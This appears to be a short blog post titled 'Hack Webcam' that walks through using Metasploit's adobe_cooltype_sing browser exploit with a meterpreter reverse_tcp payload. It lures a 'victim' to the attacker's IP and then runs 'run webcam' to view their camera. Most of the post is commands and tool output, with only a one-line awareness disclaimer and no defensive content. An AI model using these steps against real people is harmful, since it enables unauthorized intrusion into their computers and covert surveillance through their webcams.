Hack Webcam

Posted: December 22, 2014 in hacking, networking

Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and  take security yourself.

Open Metasploit and run following commands:

msf>  show exploits

msf>use windows/browser/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp

msf  exploit(adobe_cooltype_sing) > show options

Module options (exploit/windows/browser/adobe_cooltype_sing):

Name                Current Setting       Required           Description
—-                     —————               ——–               ———–
SRVHOST            0.0.0.0                   yes              The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT             8080                      yes              The local port to listen on.
SSL                         false                         no                Negotiate SSL for incoming connections
SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                                              no               The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name                  Current            Setting         Required  Description
—-                    —————       ——–              ———–
EXITFUNC        process             yes               Exit technique: seh, thread, process, none
LHOST                                             yes                The listen address
LPORT                 4444                 yes               The listen port

Exploit target:

Id  Name
—  —-
0   Automatic

msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j

Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.

msf  exploit(adobe_cooltype_sing) > session -i 1

meterpreter> run webcam

and you will get the webcam of victim. :)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s